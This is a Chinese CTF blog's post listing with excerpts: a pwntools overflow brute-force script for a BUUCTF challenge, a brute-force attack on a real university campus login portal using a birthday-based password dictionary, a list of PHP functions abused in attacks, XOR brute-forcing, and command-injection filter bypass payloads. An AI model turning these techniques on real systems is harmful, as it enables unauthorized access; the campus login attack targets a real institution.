CTF
R0g
先天八卦
展开
-
针对简单Pwn溢出题的爆破
爆破大法好例子:BUUCTF rip首先得到源程序pwn1file pwn1checksec pwn1啥也没有,很好然后拖到IDA64分析一波发现漏洞函数,地址为 0x401186 ,很好祭出脚本,开始爆破from pwn import *def brute(i): payload=b'a'*i+p64(0x401186) p=remote('node3.buuoj.cn',28460) p.sendline(payload) p.interact原创 2021-04-19 01:20:43 · 1028 阅读 · 0 评论 -
某高校校园内网登录页面爆破
某高校校园内网登录默认密码为身份证后八位的前七位推断密码为生日加三位随机数,生成密码字典f = open('password.txt', mode='a+')for i in range(int(input()), int(input())): f.write('0' + str(i) + '\n') f.close通过WireShark抓包发现页面通过get请求提交参数,编写爆破脚本import jsonimport reimport threadingimport ti原创 2021-04-16 16:03:38 · 1462 阅读 · 1 评论 -
PHP COMMON HACKING FUNCTION
1、eval()2、print_r()3、system()4、scandir()5、echo()6、var_dump()7、show_source()8、highlight_file()原创 2021-04-13 23:51:58 · 212 阅读 · 2 评论 -
XOR解密思路------爆破
例子:2018 护网杯 迟来的签到题http://www.bmzclub.cn/challenges#2018%20%E6%8A%A4%E7%BD%91%E6%9D%AF%20%E8%BF%9F%E6%9D%A5%E7%9A%84%E7%AD%BE%E5%88%B0%E9%A2%98下载压缩包后发现像是base64加密字符串给了提示 easy_xor???故直接祭出脚本爆破python easy_xor.py > result && strings result |grep原创 2021-04-13 01:31:55 · 1884 阅读 · 4 评论 -
CTF命令执行与绕过
浅谈CTF中命令执行与绕过的小技巧一、空格绕过1.cat<filename shell2.cat<>filename shell3.{cat,filename} shell4.%09 符号 php5.cat$IFS$9filename cat${IFS}filename shell二、命令分隔符号1.ls /;cat filename shell2.ls /&cat filename shell3.ls /|cat filename shell4.%0a p原创 2021-04-12 01:35:42 · 1461 阅读 · 0 评论